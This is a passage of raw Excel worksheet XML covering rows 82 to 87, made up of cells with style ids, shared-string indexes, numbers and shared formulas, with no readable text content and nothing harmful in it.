        <v>12</v>
      </c>
      <c r="DW82" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX82" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY82" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ82" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA82" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB82" s="74">
        <v>2.0</v>
      </c>
      <c r="EC82" s="74">
        <v>1.0</v>
      </c>
      <c r="ED82" s="95">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="EE82" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="83" ht="177.75" customHeight="1">
      <c r="B83" s="71" t="s">
        <v>351</v>
      </c>
      <c r="C83" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D83" s="72" t="s">
        <v>659</v>
      </c>
      <c r="E83" s="72" t="s">
        <v>882</v>
      </c>
      <c r="F83" s="72" t="s">
        <v>883</v>
      </c>
      <c r="G83" s="97" t="s">
        <v>884</v>
      </c>
      <c r="H83" s="72" t="s">
        <v>885</v>
      </c>
      <c r="I83" s="73" t="s">
        <v>886</v>
      </c>
      <c r="J83" s="73" t="s">
        <v>887</v>
      </c>
      <c r="K83" s="73" t="s">
        <v>888</v>
      </c>
      <c r="L83" s="74">
        <v>2.0</v>
      </c>
      <c r="M83" s="74">
        <v>1.0</v>
      </c>
      <c r="N83" s="74">
        <v>1.0</v>
      </c>
      <c r="O83" s="74">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="P83" s="74">
        <v>1.0</v>
      </c>
      <c r="Q83" s="74">
        <v>1.0</v>
      </c>
      <c r="R83" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S83" s="76" t="s">
        <v>889</v>
      </c>
      <c r="T83" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U83" s="77" t="s">
        <v>890</v>
      </c>
      <c r="V83" s="76" t="s">
        <v>891</v>
      </c>
      <c r="W83" s="76" t="s">
        <v>892</v>
      </c>
      <c r="X83" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y83" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z83" s="75" t="s">
        <v>893</v>
      </c>
      <c r="AA83" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB83" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC83" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD83" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE83" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF83" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG83" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH83" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI83" s="78"/>
      <c r="AJ83" s="78"/>
      <c r="AK83" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL83" s="78"/>
      <c r="AM83" s="78"/>
      <c r="AN83" s="78"/>
      <c r="AO83" s="78"/>
      <c r="AP83" s="80"/>
      <c r="AQ83" s="80"/>
      <c r="AR83" s="80"/>
      <c r="AS83" s="80">
        <v>0.0</v>
      </c>
      <c r="AT83" s="80"/>
      <c r="AU83" s="80"/>
      <c r="AV83" s="80"/>
      <c r="AW83" s="80"/>
      <c r="AX83" s="80"/>
      <c r="AY83" s="80"/>
      <c r="AZ83" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA83" s="163" t="s">
        <v>865</v>
      </c>
      <c r="BB83" s="82">
        <v>2.0</v>
      </c>
      <c r="BC83" s="82">
        <v>2.0</v>
      </c>
      <c r="BD83" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE83" s="163" t="s">
        <v>865</v>
      </c>
      <c r="BF83" s="163"/>
      <c r="BG83" s="163"/>
      <c r="BH83" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI83" s="163"/>
      <c r="BJ83" s="163"/>
      <c r="BK83" s="163"/>
      <c r="BL83" s="163"/>
      <c r="BM83" s="164"/>
      <c r="BN83" s="164"/>
      <c r="BO83" s="164"/>
      <c r="BP83" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ83" s="83"/>
      <c r="BR83" s="83"/>
      <c r="BS83" s="83"/>
      <c r="BT83" s="83"/>
      <c r="BU83" s="83"/>
      <c r="BV83" s="83"/>
      <c r="BW83" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX83" s="165" t="s">
        <v>865</v>
      </c>
      <c r="BY83" s="85">
        <v>2.0</v>
      </c>
      <c r="BZ83" s="85">
        <v>2.0</v>
      </c>
      <c r="CA83" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB83" s="165" t="s">
        <v>865</v>
      </c>
      <c r="CC83" s="165"/>
      <c r="CD83" s="165"/>
      <c r="CE83" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF83" s="165"/>
      <c r="CG83" s="165"/>
      <c r="CH83" s="165"/>
      <c r="CI83" s="165"/>
      <c r="CJ83" s="166"/>
      <c r="CK83" s="166"/>
      <c r="CL83" s="166"/>
      <c r="CM83" s="86">
        <v>0.0</v>
      </c>
      <c r="CN83" s="86"/>
      <c r="CO83" s="86"/>
      <c r="CP83" s="86"/>
      <c r="CQ83" s="86"/>
      <c r="CR83" s="86"/>
      <c r="CS83" s="86"/>
      <c r="CT83" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU83" s="88" t="s">
        <v>894</v>
      </c>
      <c r="CV83" s="88">
        <v>5.0</v>
      </c>
      <c r="CW83" s="88">
        <v>6.0</v>
      </c>
      <c r="CX83" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY83" s="88" t="s">
        <v>895</v>
      </c>
      <c r="CZ83" s="88"/>
      <c r="DA83" s="88"/>
      <c r="DB83" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC83" s="88"/>
      <c r="DD83" s="88"/>
      <c r="DE83" s="88"/>
      <c r="DF83" s="88"/>
      <c r="DG83" s="89"/>
      <c r="DH83" s="89"/>
      <c r="DI83" s="89"/>
      <c r="DJ83" s="89">
        <v>0.0</v>
      </c>
      <c r="DK83" s="89"/>
      <c r="DL83" s="89"/>
      <c r="DM83" s="89"/>
      <c r="DN83" s="89"/>
      <c r="DO83" s="89"/>
      <c r="DP83" s="89"/>
      <c r="DQ83" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR83" s="91"/>
      <c r="DS83" s="168">
        <v>52169.0</v>
      </c>
      <c r="DT83" s="93">
        <v>1.0</v>
      </c>
      <c r="DU83" s="93">
        <v>2.0</v>
      </c>
      <c r="DV83" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW83" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX83" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY83" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ83" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA83" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB83" s="74"/>
      <c r="EC83" s="74">
        <v>0.0</v>
      </c>
      <c r="ED83" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE83" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="84" ht="177.75" customHeight="1">
      <c r="B84" s="71" t="s">
        <v>351</v>
      </c>
      <c r="C84" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D84" s="72" t="s">
        <v>659</v>
      </c>
      <c r="E84" s="72" t="s">
        <v>896</v>
      </c>
      <c r="F84" s="72" t="s">
        <v>897</v>
      </c>
      <c r="G84" s="97" t="s">
        <v>898</v>
      </c>
      <c r="H84" s="72" t="s">
        <v>899</v>
      </c>
      <c r="I84" s="73" t="s">
        <v>900</v>
      </c>
      <c r="J84" s="73" t="s">
        <v>870</v>
      </c>
      <c r="K84" s="73" t="s">
        <v>901</v>
      </c>
      <c r="L84" s="74">
        <v>1.0</v>
      </c>
      <c r="M84" s="74">
        <v>1.0</v>
      </c>
      <c r="N84" s="74">
        <v>1.0</v>
      </c>
      <c r="O84" s="74">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="P84" s="74">
        <v>1.0</v>
      </c>
      <c r="Q84" s="74">
        <v>1.0</v>
      </c>
      <c r="R84" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S84" s="76" t="s">
        <v>902</v>
      </c>
      <c r="T84" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U84" s="77" t="s">
        <v>903</v>
      </c>
      <c r="V84" s="76" t="s">
        <v>904</v>
      </c>
      <c r="W84" s="76" t="s">
        <v>905</v>
      </c>
      <c r="X84" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y84" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z84" s="75" t="s">
        <v>893</v>
      </c>
      <c r="AA84" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB84" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC84" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD84" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE84" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF84" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG84" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH84" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI84" s="78"/>
      <c r="AJ84" s="78"/>
      <c r="AK84" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL84" s="78"/>
      <c r="AM84" s="78"/>
      <c r="AN84" s="78"/>
      <c r="AO84" s="78"/>
      <c r="AP84" s="80"/>
      <c r="AQ84" s="80"/>
      <c r="AR84" s="80"/>
      <c r="AS84" s="80">
        <v>0.0</v>
      </c>
      <c r="AT84" s="80"/>
      <c r="AU84" s="80"/>
      <c r="AV84" s="80"/>
      <c r="AW84" s="80"/>
      <c r="AX84" s="80"/>
      <c r="AY84" s="80"/>
      <c r="AZ84" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA84" s="163" t="s">
        <v>906</v>
      </c>
      <c r="BB84" s="82">
        <v>3.0</v>
      </c>
      <c r="BC84" s="82">
        <v>4.0</v>
      </c>
      <c r="BD84" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE84" s="163" t="s">
        <v>906</v>
      </c>
      <c r="BF84" s="163"/>
      <c r="BG84" s="163"/>
      <c r="BH84" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI84" s="163"/>
      <c r="BJ84" s="163"/>
      <c r="BK84" s="163"/>
      <c r="BL84" s="163"/>
      <c r="BM84" s="164"/>
      <c r="BN84" s="164"/>
      <c r="BO84" s="164"/>
      <c r="BP84" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ84" s="83"/>
      <c r="BR84" s="83"/>
      <c r="BS84" s="83"/>
      <c r="BT84" s="83"/>
      <c r="BU84" s="83"/>
      <c r="BV84" s="83"/>
      <c r="BW84" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX84" s="85" t="s">
        <v>907</v>
      </c>
      <c r="BY84" s="85">
        <v>4.0</v>
      </c>
      <c r="BZ84" s="85">
        <v>24.0</v>
      </c>
      <c r="CA84" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB84" s="85" t="s">
        <v>908</v>
      </c>
      <c r="CC84" s="85"/>
      <c r="CD84" s="85"/>
      <c r="CE84" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF84" s="85"/>
      <c r="CG84" s="85"/>
      <c r="CH84" s="85"/>
      <c r="CI84" s="85"/>
      <c r="CJ84" s="86"/>
      <c r="CK84" s="86"/>
      <c r="CL84" s="86"/>
      <c r="CM84" s="86">
        <v>0.0</v>
      </c>
      <c r="CN84" s="86"/>
      <c r="CO84" s="86"/>
      <c r="CP84" s="86"/>
      <c r="CQ84" s="86"/>
      <c r="CR84" s="86"/>
      <c r="CS84" s="86"/>
      <c r="CT84" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU84" s="88" t="s">
        <v>909</v>
      </c>
      <c r="CV84" s="88">
        <v>7.0</v>
      </c>
      <c r="CW84" s="88">
        <v>30.0</v>
      </c>
      <c r="CX84" s="79" t="s">
        <v>880</v>
      </c>
      <c r="CY84" s="88" t="s">
        <v>910</v>
      </c>
      <c r="CZ84" s="88"/>
      <c r="DA84" s="88"/>
      <c r="DB84" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC84" s="88"/>
      <c r="DD84" s="88"/>
      <c r="DE84" s="88"/>
      <c r="DF84" s="88"/>
      <c r="DG84" s="89"/>
      <c r="DH84" s="89"/>
      <c r="DI84" s="89"/>
      <c r="DJ84" s="89">
        <v>0.0</v>
      </c>
      <c r="DK84" s="89"/>
      <c r="DL84" s="89"/>
      <c r="DM84" s="89"/>
      <c r="DN84" s="89"/>
      <c r="DO84" s="89"/>
      <c r="DP84" s="89"/>
      <c r="DQ84" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR84" s="91"/>
      <c r="DS84" s="168">
        <v>52169.0</v>
      </c>
      <c r="DT84" s="93">
        <v>1.0</v>
      </c>
      <c r="DU84" s="93">
        <v>7.0</v>
      </c>
      <c r="DV84" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW84" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX84" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY84" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ84" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA84" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB84" s="74"/>
      <c r="EC84" s="74">
        <v>0.0</v>
      </c>
      <c r="ED84" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE84" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="85" ht="177.75" customHeight="1">
      <c r="B85" s="71" t="s">
        <v>351</v>
      </c>
      <c r="C85" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D85" s="72" t="s">
        <v>659</v>
      </c>
      <c r="E85" s="72" t="s">
        <v>911</v>
      </c>
      <c r="F85" s="72" t="s">
        <v>912</v>
      </c>
      <c r="G85" s="97" t="s">
        <v>913</v>
      </c>
      <c r="H85" s="72" t="s">
        <v>914</v>
      </c>
      <c r="I85" s="73" t="s">
        <v>915</v>
      </c>
      <c r="J85" s="73" t="s">
        <v>916</v>
      </c>
      <c r="K85" s="73" t="s">
        <v>917</v>
      </c>
      <c r="L85" s="74">
        <v>1.0</v>
      </c>
      <c r="M85" s="74">
        <v>1.0</v>
      </c>
      <c r="N85" s="74">
        <v>1.0</v>
      </c>
      <c r="O85" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P85" s="74">
        <v>1.0</v>
      </c>
      <c r="Q85" s="74">
        <v>0.0</v>
      </c>
      <c r="R85" s="75" t="s">
        <v>307</v>
      </c>
      <c r="S85" s="76" t="s">
        <v>918</v>
      </c>
      <c r="T85" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U85" s="77" t="s">
        <v>919</v>
      </c>
      <c r="V85" s="76" t="s">
        <v>920</v>
      </c>
      <c r="W85" s="76" t="s">
        <v>921</v>
      </c>
      <c r="X85" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y85" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z85" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA85" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB85" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC85" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD85" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE85" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF85" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG85" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH85" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI85" s="78"/>
      <c r="AJ85" s="78"/>
      <c r="AK85" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL85" s="78"/>
      <c r="AM85" s="78"/>
      <c r="AN85" s="78"/>
      <c r="AO85" s="78"/>
      <c r="AP85" s="80"/>
      <c r="AQ85" s="80"/>
      <c r="AR85" s="80"/>
      <c r="AS85" s="80">
        <v>0.0</v>
      </c>
      <c r="AT85" s="80"/>
      <c r="AU85" s="80"/>
      <c r="AV85" s="80"/>
      <c r="AW85" s="80"/>
      <c r="AX85" s="80"/>
      <c r="AY85" s="80"/>
      <c r="AZ85" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA85" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB85" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC85" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD85" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE85" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF85" s="82"/>
      <c r="BG85" s="82"/>
      <c r="BH85" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI85" s="82"/>
      <c r="BJ85" s="82"/>
      <c r="BK85" s="82"/>
      <c r="BL85" s="82"/>
      <c r="BM85" s="83"/>
      <c r="BN85" s="83"/>
      <c r="BO85" s="83"/>
      <c r="BP85" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ85" s="83"/>
      <c r="BR85" s="83"/>
      <c r="BS85" s="83"/>
      <c r="BT85" s="83"/>
      <c r="BU85" s="83"/>
      <c r="BV85" s="83"/>
      <c r="BW85" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX85" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY85" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ85" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA85" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB85" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC85" s="85"/>
      <c r="CD85" s="85"/>
      <c r="CE85" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF85" s="85"/>
      <c r="CG85" s="85"/>
      <c r="CH85" s="85"/>
      <c r="CI85" s="85"/>
      <c r="CJ85" s="86"/>
      <c r="CK85" s="86"/>
      <c r="CL85" s="86"/>
      <c r="CM85" s="86">
        <v>0.0</v>
      </c>
      <c r="CN85" s="86"/>
      <c r="CO85" s="86"/>
      <c r="CP85" s="86"/>
      <c r="CQ85" s="86"/>
      <c r="CR85" s="86"/>
      <c r="CS85" s="86"/>
      <c r="CT85" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU85" s="88" t="s">
        <v>922</v>
      </c>
      <c r="CV85" s="88">
        <v>2.0</v>
      </c>
      <c r="CW85" s="88">
        <v>2.0</v>
      </c>
      <c r="CX85" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY85" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ85" s="88"/>
      <c r="DA85" s="88"/>
      <c r="DB85" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC85" s="88"/>
      <c r="DD85" s="88"/>
      <c r="DE85" s="88"/>
      <c r="DF85" s="88"/>
      <c r="DG85" s="89"/>
      <c r="DH85" s="89"/>
      <c r="DI85" s="89"/>
      <c r="DJ85" s="89">
        <v>0.0</v>
      </c>
      <c r="DK85" s="89"/>
      <c r="DL85" s="89"/>
      <c r="DM85" s="89"/>
      <c r="DN85" s="89"/>
      <c r="DO85" s="89"/>
      <c r="DP85" s="89"/>
      <c r="DQ85" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR85" s="91"/>
      <c r="DS85" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT85" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU85" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV85" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW85" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX85" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY85" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ85" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA85" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB85" s="74"/>
      <c r="EC85" s="74">
        <v>0.0</v>
      </c>
      <c r="ED85" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE85" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="86" ht="153.75" customHeight="1">
      <c r="B86" s="71" t="s">
        <v>351</v>
      </c>
      <c r="C86" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D86" s="72" t="s">
        <v>659</v>
      </c>
      <c r="E86" s="72" t="s">
        <v>911</v>
      </c>
      <c r="F86" s="72" t="s">
        <v>912</v>
      </c>
      <c r="G86" s="97" t="s">
        <v>923</v>
      </c>
      <c r="H86" s="72" t="s">
        <v>924</v>
      </c>
      <c r="I86" s="73" t="s">
        <v>925</v>
      </c>
      <c r="J86" s="73" t="s">
        <v>926</v>
      </c>
      <c r="K86" s="73" t="s">
        <v>927</v>
      </c>
      <c r="L86" s="74">
        <v>1.0</v>
      </c>
      <c r="M86" s="74">
        <v>1.0</v>
      </c>
      <c r="N86" s="74">
        <v>1.0</v>
      </c>
      <c r="O86" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P86" s="74">
        <v>1.0</v>
      </c>
      <c r="Q86" s="74">
        <v>0.0</v>
      </c>
      <c r="R86" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S86" s="76" t="s">
        <v>928</v>
      </c>
      <c r="T86" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U86" s="77" t="s">
        <v>929</v>
      </c>
      <c r="V86" s="76" t="s">
        <v>930</v>
      </c>
      <c r="W86" s="76" t="s">
        <v>931</v>
      </c>
      <c r="X86" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y86" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z86" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA86" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB86" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC86" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD86" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE86" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF86" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG86" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH86" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI86" s="78"/>
      <c r="AJ86" s="78"/>
      <c r="AK86" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL86" s="78"/>
      <c r="AM86" s="78"/>
      <c r="AN86" s="78"/>
      <c r="AO86" s="78"/>
      <c r="AP86" s="80"/>
      <c r="AQ86" s="80"/>
      <c r="AR86" s="80"/>
      <c r="AS86" s="80">
        <v>0.0</v>
      </c>
      <c r="AT86" s="80"/>
      <c r="AU86" s="80"/>
      <c r="AV86" s="80"/>
      <c r="AW86" s="80"/>
      <c r="AX86" s="80"/>
      <c r="AY86" s="80"/>
      <c r="AZ86" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA86" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB86" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC86" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD86" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE86" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF86" s="82"/>
      <c r="BG86" s="82"/>
      <c r="BH86" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI86" s="82"/>
      <c r="BJ86" s="82"/>
      <c r="BK86" s="82"/>
      <c r="BL86" s="82"/>
      <c r="BM86" s="83"/>
      <c r="BN86" s="83"/>
      <c r="BO86" s="83"/>
      <c r="BP86" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ86" s="83"/>
      <c r="BR86" s="83"/>
      <c r="BS86" s="83"/>
      <c r="BT86" s="83"/>
      <c r="BU86" s="83"/>
      <c r="BV86" s="83"/>
      <c r="BW86" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX86" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY86" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ86" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA86" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB86" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC86" s="85"/>
      <c r="CD86" s="85"/>
      <c r="CE86" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF86" s="85"/>
      <c r="CG86" s="85"/>
      <c r="CH86" s="85"/>
      <c r="CI86" s="85"/>
      <c r="CJ86" s="86"/>
      <c r="CK86" s="86"/>
      <c r="CL86" s="86"/>
      <c r="CM86" s="86">
        <v>0.0</v>
      </c>
      <c r="CN86" s="86"/>
      <c r="CO86" s="86"/>
      <c r="CP86" s="86"/>
      <c r="CQ86" s="86"/>
      <c r="CR86" s="86"/>
      <c r="CS86" s="86"/>
      <c r="CT86" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU86" s="88" t="s">
        <v>932</v>
      </c>
      <c r="CV86" s="88">
        <v>3.0</v>
      </c>
      <c r="CW86" s="88">
        <v>40.0</v>
      </c>
      <c r="CX86" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY86" s="88">
        <v>2100628.0</v>
      </c>
      <c r="CZ86" s="88"/>
      <c r="DA86" s="88"/>
      <c r="DB86" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC86" s="88"/>
      <c r="DD86" s="88"/>
      <c r="DE86" s="88"/>
      <c r="DF86" s="88"/>
      <c r="DG86" s="89"/>
      <c r="DH86" s="89"/>
      <c r="DI86" s="89"/>
      <c r="DJ86" s="89">
        <v>0.0</v>
      </c>
      <c r="DK86" s="89"/>
      <c r="DL86" s="89"/>
      <c r="DM86" s="89"/>
      <c r="DN86" s="89"/>
      <c r="DO86" s="89"/>
      <c r="DP86" s="89"/>
      <c r="DQ86" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR86" s="91"/>
      <c r="DS86" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT86" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU86" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV86" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW86" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX86" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY86" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ86" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA86" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB86" s="74"/>
      <c r="EC86" s="74">
        <v>1.0</v>
      </c>
      <c r="ED86" s="95">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="EE86" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="87" ht="153.75" customHeight="1">
      <c r="B87" s="71" t="s">
        <v>351</v>
      </c>
      <c r="C87" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D87" s="72" t="s">
        <v>659</v>
      </c>
      <c r="E87" s="72" t="s">
        <v>933</v>
      </c>
      <c r="F87" s="72" t="s">
        <v>934</v>
      </c>
      <c r="G87" s="72" t="s">
        <v>12</v>
      </c>
      <c r="H87" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I87" s="73" t="s">
        <v>935</v>
      </c>
      <c r="J87" s="73" t="s">
        <v>936</v>
      </c>
      <c r="K87" s="73" t="s">
        <v>937</v>
      </c>
      <c r="L87" s="74">
        <v>7.0</v>
      </c>
      <c r="M87" s="74">
        <v>1.0</v>
      </c>
      <c r="N87" s="74">
        <v>1.0</v>
      </c>
      <c r="O87" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P87" s="74">
        <v>1.0</v>
      </c>
      <c r="Q87" s="74">
        <v>0.0</v>
      </c>
      <c r="R87" s="75" t="s">
        <v>106</v>
      </c>
      <c r="S87" s="76" t="s">
        <v>938</v>
      </c>
      <c r="T87" s="76" t="s">
        <v>939</v>
      </c>
      <c r="U87" s="77" t="s">
        <v>940</v>
      </c>
      <c r="V87" s="76" t="s">
        <v>191</v>
      </c>
      <c r="W87" s="109"/>
      <c r="X87" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y87" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z87" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA87" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB87" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC87" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD87" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE87" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF87" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG87" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH87" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI87" s="78"/>
      <c r="AJ87" s="78"/>
      <c r="AK87" s="78" t="str">
